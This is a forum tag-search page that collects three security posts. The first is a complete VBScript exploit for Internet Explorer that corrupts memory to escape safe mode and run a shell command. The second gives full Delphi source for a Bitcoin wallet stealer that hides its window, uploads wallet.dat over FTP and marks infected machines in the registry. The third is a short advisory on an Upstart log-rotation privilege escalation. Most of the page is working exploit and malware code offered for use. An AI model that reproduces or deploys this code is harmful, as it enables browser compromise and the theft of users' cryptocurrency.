Search the Community
Showing results for tags 'begin'.
-
//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. https://twitter.com/yuange75 http://http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html>
-
Ce parere aveti despre wallet stealer-ul asta https://leakforums.org/thread-232703 program dbs; // Bitcoin Stealer // developed by Jimmy // for http://exclusivehackingtools.blogspot.com {$IF CompilerVersion >= 21.0} {$WEAKLINKRTTI ON} {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])} {$IFEND} uses Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry; // Function to set the window state hidden function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow'; // Function to get the AppData path function AppDataPath: String; const SHGFP_TYPE_CURRENT = 0; var Path: array [0 .. MAXCHAR] of char; begin SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @path[0]); Result := StrPas(Path); end; // Function to check a file size function FileSize(FileName: wideString): Int64; var sr: TSearchRec; begin if FindFirst(FileName, faAnyFile, sr) = 0 then Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow) else Result := -1; FindClose(sr); end; // Function to generate random string function RandomString(PLen: Integer): string; var str: string; begin Randomize; str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; Result := ''; repeat Result := Result + str[Random(Length(str)) + 1]; until (Length(Result) = PLen); end; // ============================================================================ var Debug: Boolean; FTP: TIdFTP; REG: TRegIniFile; RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String; Error: String; begin // The window should be hidden without using this API ShowWindow(GetConsoleWindow, SW_HIDE); // Debug or build release ? Debug := True; // Set registry key value (random) RegValue := '6556'; // At the end of the first execution we will write a key in the registry. // Now we will try check if the key exists. If yes, it means // that the wallet has already be stolen. Avoid useless duplicates. try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKeyReadOnly('Software'); RegCurrentValue := REG.ReadString('Google', 'Version', ''); REG.CloseKey; REG.Free; except end; // Check if wallet has been already stolen (to avoid duplicates) if not(RegCurrentValue = RegValue) then begin try // Generate path to Bitcoin wallet file if Win32MajorVersion >= 6 then // Microsoft Windows Vista and newer Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat') else // Microsoft Windows XP Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat'); // If wallet file exists, check the FileSize (skip large file > 10MB) if FileExists(Path) then if FileSize(Path) < 10000000 then begin // Generate a random filename FileName := RandomString(20) + '.dat'; // Initialize upload via Indy FTP component FTP := TIdFTP.Create(); FTP.ConnectTimeout := 20000; FTP.ReadTimeout := 20000; // Setup with your FTP details FTP.Host := 'ftp.host.com'; FTP.Username := 'username'; FTP.Password := 'password'; UploadPath := 'www/'; // Connect and upload if not Debug then begin FTP.Connect; FTP.Put(Path, UploadPath + FileName); end; // After upload attempt, disconnect and free the FTP component FTP.Quit; FTP.Disconnect; FTP.Free; // Try to add a key to registry to avoid double execution try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKey('Software', True); REG.WriteString('Google', 'Version', RegValue); REG.CloseKey; REG.Free; except end; end; except // Catch error, you never know... on E: Exception do Error := E.ClassName + ': ' + E.Message; end; end; end.
-
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Although just reported to Ubuntu, this minor dev-branch issue was already made public. As the launchpad/lkml/... feed-miners should not play all the games alone, and as others may want to learn how beginner errors still make it into packages of quite large distributions, enjoy the power of for session in /run/user/*/upstart/sessions/* do env $(cat $session) /sbin/initctl emit rotate-logs >/dev/null 2>&1 || true done executed as root. See [1] hd [1] http://www.halfdog.net/Security/2015/UpstartLogrotationPrivilegeEscalation/ - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iEYEARECAAYFAlTwJXEACgkQxFmThv7tq+4LKgCcCKMaOdO0xObIno415g6qZAxp LZQAnj8giZDPkLYZPD/TVhY958/vXMSJ =xyAX -----END PGP SIGNATURE----- Source